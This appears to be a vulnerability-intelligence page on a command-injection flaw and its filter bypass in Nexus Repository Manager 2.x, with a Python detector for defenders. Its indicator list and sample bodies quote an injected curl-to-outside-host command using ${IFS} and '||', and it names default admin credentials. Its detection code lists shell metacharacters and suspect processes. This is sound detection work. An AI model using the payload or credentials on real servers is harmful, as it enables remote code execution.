CVE-2019-5475
published 2019-11-01


Priority: P2 (67)
CVSS 3.0: 8.8 high
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS: 18.40% (96.9th percentile)
There is an OS Command Injection in Nexus Repository Manager <= 2.14.14 (a bypass of the CVE-2019-5475 fix) that could allow an attacker Remote Code Execution (RCE). All instances that pass user-supplied data through CommandLineExecutor.java are vulnerable, such as the Yum Configuration Capability.

Affected (3 ranges)

Vendor     Product                    Version range      Fixed in
sonatype   nexus_repository_manager   <= 2.14.14
sonatype   nexus_repository_manager   (not listed)
sonatype   nexus_repository_manager   2.0 – 2.14.9-01

Detection & IOCs (extracted from sources)

url       PUT /nexus/service/siesta/capabilities/000013ea3743a556
command   /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo
command   C:\Windows\System32\calc.exe
path      /nexus/service/siesta/capabilities/
  • Monitor HTTP PUT requests to the Nexus REST endpoint /nexus/service/siesta/capabilities/* that modify Yum Configuration capabilities, especially changes to the createrepoPath or mergerepoPath fields that contain shell metacharacters or an unexpected binary path.
  • Detect IFS-based space substitution (${IFS}) in request bodies sent to the Nexus capability configuration endpoint; it is used to evade the getCleanCommand filter introduced by the CVE-2019-5475 patch.
  • Alert when the Nexus Repository Manager process spawns unexpected child processes (e.g. bash, curl, calc.exe) as SYSTEM or the Nexus service account; the command is launched from the CommandLineExecutor.java execution context.
  • Inspect the XML payload of PUT requests to the capabilities API for createrepoPath values other than the path to a legitimate createrepo/mergerepo binary.
  • The bypass (CVE-2019-15588) affects Nexus Repository Manager <= 2.14.14: the CVE-2019-5475 patch added getCleanCommand() filtering, which is incomplete and can be evaded with ${IFS} substitution and shell logical operators such as ||.
  • Exploitation requires an authenticated user with sufficient privileges (e.g. admin) to create or edit Yum Configuration capabilities; the PoC's Authorization header uses HTTP Basic auth with the default admin:admin123 credentials.
  • On Windows, Nexus appends --version to the injected OS command, which affects payload construction but does not prevent the injected binary from executing.
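The request-body and process-lineage checks from the bullets above, as an added detection example in Python; this is not code from the page, from Sonatype, or from the PoC. Assumptions, labelled in the comments: the capability PUT body is modelled as a simplified XML document with <property><key>/<value> pairs (the real Nexus 2 siesta payload may differ, so adapt the parsing to captured traffic), the sample bodies are constructed, and the Nexus 2 service is identified as a java process whose command line contains "nexus".

```python
import re
import xml.etree.ElementTree as ET

# Endpoint and property names taken from the detection notes above.
CAPABILITIES_PATH = "/nexus/service/siesta/capabilities/"
WATCHED_KEYS = {"createrepoPath", "mergerepoPath"}
# Expected binaries for those properties. Deployments may use full paths,
# so only the basename is compared against this allowlist (assumption).
ALLOWED_BASENAMES = {"createrepo", "mergerepo"}
# Shell constructs that never belong in a path to a binary: IFS substitution,
# logical operators, pipes, command substitution, redirection, whitespace.
SHELL_META = re.compile(r"\$\{IFS\}|\$IFS|\|\||&&|;|\||`|\$\(|[<>]|\s")


def inspect_value(key, value):
    """Return human-readable findings for one capability property value."""
    findings = []
    if SHELL_META.search(value):
        findings.append(f"{key}: shell metacharacter or IFS substitution in {value!r}")
    # Last path segment on either separator; Windows paths use backslashes.
    basename = re.split(r"[\\/]", value.strip())[-1]
    if basename not in ALLOWED_BASENAMES:
        findings.append(f"{key}: unexpected binary {basename!r}")
    return findings


def inspect_request(method, path, body):
    """Inspect one HTTP request; non-PUT or off-path requests yield no findings.

    Assumption: the body is XML with <property><key>/<value> pairs. The real
    siesta payload may differ; only the parsing here depends on that.
    """
    if method.upper() != "PUT" or not path.startswith(CAPABILITIES_PATH):
        return []
    root = ET.fromstring(body)
    findings = []
    for prop in root.iter("property"):
        key = (prop.findtext("key") or "").strip()
        if key in WATCHED_KEYS:
            findings.extend(inspect_value(key, prop.findtext("value") or ""))
    return findings


# Process-lineage check for the child-process bullet. Assumption: Nexus 2 runs
# as a java process whose command line mentions "nexus".
NEXUS_PARENT_IMAGES = {"java", "java.exe"}
SUSPECT_CHILD_IMAGES = {"bash", "sh", "dash", "cmd.exe", "powershell.exe",
                        "curl", "wget", "calc.exe"}


def _basename(image):
    return re.split(r"[\\/]", image)[-1].lower()


def suspicious_spawn(parent_image, parent_cmdline, child_image):
    """True when the Nexus java process directly spawns a shell or downloader."""
    return (_basename(parent_image) in NEXUS_PARENT_IMAGES
            and "nexus" in parent_cmdline.lower()
            and _basename(child_image) in SUSPECT_CHILD_IMAGES)


# Constructed sample payloads (not captured traffic). The first carries the
# ${IFS} / "||" command quoted in the IOC list above; note that it still ends
# in "/createrepo", so a basename allowlist on its own would wave it through.
BODY_BYPASS = r"""<capability><id>000013ea3743a556</id><properties>
<property><key>createrepoPath</key><value>/bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo</value></property>
<property><key>mergerepoPath</key><value>/usr/bin/mergerepo</value></property>
</properties></capability>"""
BODY_WINDOWS = r"""<capability><id>000013ea3743a556</id><properties>
<property><key>createrepoPath</key><value>C:\Windows\System32\calc.exe</value></property>
</properties></capability>"""
BODY_BENIGN = r"""<capability><id>000013ea3743a556</id><properties>
<property><key>createrepoPath</key><value>/usr/bin/createrepo</value></property>
<property><key>mergerepoPath</key><value>mergerepo</value></property>
</properties></capability>"""
CAP_URL = CAPABILITIES_PATH + "000013ea3743a556"


if __name__ == "__main__":
    for label, body in (("bypass", BODY_BYPASS), ("windows", BODY_WINDOWS),
                        ("benign", BODY_BENIGN)):
        print(label, inspect_request("PUT", CAP_URL, body))
    print(suspicious_spawn("/usr/bin/java", "java -Dnexus-work=/sonatype-work",
                           "/bin/bash"))
```

The two checks are deliberately independent: the Linux bypass payload passes the basename allowlist because the attacker appended /createrepo, and is caught only by the metacharacter check, while the Windows calc.exe path contains no metacharacters and is caught only by the allowlist. Feed inspect_request from a reverse-proxy or WAF request log and suspicious_spawn from EDR or auditd process-creation events rather than from the constructed samples.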

CVSS provenance

Source   Version   Score   Severity   Vector
nvd      3.0       8.8     HIGH       CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd      2.0       9.0     CRITICAL   AV:N/AC:L/Au:S/C:C/I:C/A:C